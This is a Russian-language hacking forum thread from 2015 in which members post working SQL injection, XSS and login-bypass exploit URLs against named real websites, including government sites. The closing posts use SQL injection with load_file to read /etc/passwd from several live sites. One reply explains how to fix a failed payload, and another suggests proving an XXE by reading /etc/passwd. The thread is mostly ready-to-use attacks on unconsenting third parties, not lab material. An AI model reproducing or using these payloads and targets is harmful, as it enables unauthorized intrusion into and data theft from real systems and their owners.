HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 28.06.2015, 23:59
3nvY
Guest
Сообщений: n/a
Провел на форуме:
15245

Репутация: 11
По умолчанию

Значит остались самые трудные из списка: XXE и RCE + надо начинать усилено изучать PHP и SQL. Спасибо что поставили меня на путь праведный , а то так бы и продолжал морально разлагаться и в игрушки играть.
 
Ответить с цитированием

  #42  
Старый 29.06.2015, 14:03
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от semen6192  
semen6192 said:

1)Сайт:
http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi
Эксплойт:
http://www.felixfilm.se/film.php?id=...,6,7,8,9,10 --
2)Сайт:
http://prontowash.com/usa/location.php?id=2
Уязвимость: SQLi
Эксплойт:
http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--
3)Сайт:
http://www.comtecwash.com/photos.php?id=1
Уязвимость: SQLi
Эксплойт:
http://www.comtecwash.com/photos.php?id=-1
UNION SELECT 1,2,3,4,version(),6,7,8,9,10--
4)Сайт:
http://odessa-life.od.ua
Уязвимость: XSS
Эксплойт:
http://odessa-life.od.ua/gue/search
P.S В поиске: alert('1')
5)Сайт:
http://mapexpert.com.ua/index_ru.php?id=67&table=news
Уязвимость: SQLi
Эксплойт:
http://mapexpert.com.ua/index_ru.php...--+&table=news
P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')
6)Сайт:
http://prokudin-gorskiy.ru
Уязвимость: XSS
Эксплойт:
http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru' )
SQL защитано, XSS нет, в конкурсе запрещены ru/ua
 
Ответить с цитированием

  #43  
Старый 30.06.2015, 00:26
semen6192
Guest
Сообщений: n/a
Провел на форуме:
6419

Репутация: 2
По умолчанию

1)Сайт: http://dogarchive.kennel-apbt.com/

Уязвимость SQLi

Эксплойт: http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php

вписываем:

логин - ' or 1=1#

пароль - ' or 1=1 '#

И видим снизу:Online registred users:admin и т.д

2) Сайт: http://lineforheaven.com/soul.php?id=174

Уязвимость: SQLi

Эксплойт: http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 --

3)Сайт: https://www.harptabs.com

Уязвимость: SQLi

Эксплойт: https://www.harptabs.com/login.php

Я нашел логин пользователя на сайте и вписал:

Логин: Ceja8460' or 1=1#

Пароль: Ceja8460' or 1=1 '#

Зашло под логином:

Welcome, Ceja8460' or 1=1#

4)Сайт: http://www.ibdb.com/search.php

Уязвимость: XSS

Эксплойт: http://www.ibdb.com/search.php

в поле поиска вписываем: alert('antichat.ru')

5)Сайт: http://www.kpa.gov.my

Уязвимость: XSS(в поиску), SQLi

Єксплойт: http://www.kpa.gov.my/pages.php?mod=search_result

SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:

http://www.kpa.gov.my/modules/web/page_print.php?id=
 
Ответить с цитированием

  #44  
Старый 02.07.2015, 20:20
3nvY
Guest
Сообщений: n/a
Провел на форуме:
15245

Репутация: 11
По умолчанию

Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?
 
Ответить с цитированием

  #45  
Старый 02.07.2015, 21:38
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от 3nvY  
3nvY said:

Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?
например, прочитать /etc/passwd. выложить полный запрос (можно перехватить через burp suite, например)
 
Ответить с цитированием

  #46  
Старый 08.07.2015, 14:33
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target:police.gov.bd

type:SQL Injection

version:5.1.69

Код:
Code:
http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
 
Ответить с цитированием

  #47  
Старый 08.07.2015, 14:46
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от semen6192  
semen6192 said:

1)Сайт:
http://dogarchive.kennel-apbt.com/
Уязвимость SQLi
Эксплойт:
http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php
вписываем:
логин - ' or 1=1#
пароль - ' or 1=1 '#
И видим снизу:
Online registred users:
admin и т.д
2) Сайт:
http://lineforheaven.com/soul.php?id=174
Уязвимость: SQLi
Эксплойт:
http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 --
3)Сайт:
https://www.harptabs.com
Уязвимость: SQLi
Эксплойт:
https://www.harptabs.com/login.php
Я нашел логин пользователя на сайте и вписал:
Логин: Ceja8460' or 1=1#
Пароль: Ceja8460' or 1=1 '#
Зашло под логином:
Welcome, Ceja8460' or 1=1#
4)Сайт:
http://www.ibdb.com/search.php
Уязвимость: XSS
Эксплойт:
http://www.ibdb.com/search.php
в поле поиска вписываем: alert('antichat.ru')
5)Сайт:
http://www.kpa.gov.my
Уязвимость: XSS(в поиску), SQLi
Єксплойт:
http://www.kpa.gov.my/pages.php?mod=search_result
SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:
http://www.kpa.gov.my/modules/web/page_print.php?id=
1) SQL в username, а не в поле пароля.

admin'or(1)='1

123

2) ОК

3) Не смог разлогиниться, удаление куков не помогло.

Тоже ошибся в каком-то из полей.

4) Наверное всё-таки не стоит указывать имя ресурса. Администрация уязвимого ресурса (а они смотрят логи), да и форума, скорее всего, не одобрит.

5) SQL Inj там нету. Ошибка из NULL в качестве значения переменной.
 
Ответить с цитированием

  #48  
Старый 10.07.2015, 04:09
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

XSS уязвимость

Код:
Code:
http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22%3E%3Cscript%3Ealert%28
/XSS/%29%3C/script%3E
 
Ответить с цитированием

  #49  
Старый 10.07.2015, 06:20
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Сайт: http://celtsat.com.br

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.albit.com.au

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: nijifan.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.apva.org

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.th.boots.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.shanson.biz

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.io-arch.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.tokaiguitar.de

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: islamic-wallpapers.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.florentina.ro

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.pronv.us

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: ravco.jp

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: www.themasterswoodshop.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
 
Ответить с цитированием

  #50  
Старый 10.07.2015, 06:31
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Сайт:www.themasterswoodshop.com

Уязвимость: Local File Reading

Эксплоит:

Код:
Code:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--
Сайт:www.io-arch.com

Уязвимость: Local File Reading

Эксплоит:

Код:
Code:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--
Сайт:www.ravco.jp

Уязвимость: Local File Reading

Эксплоит:

Код:
Code:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ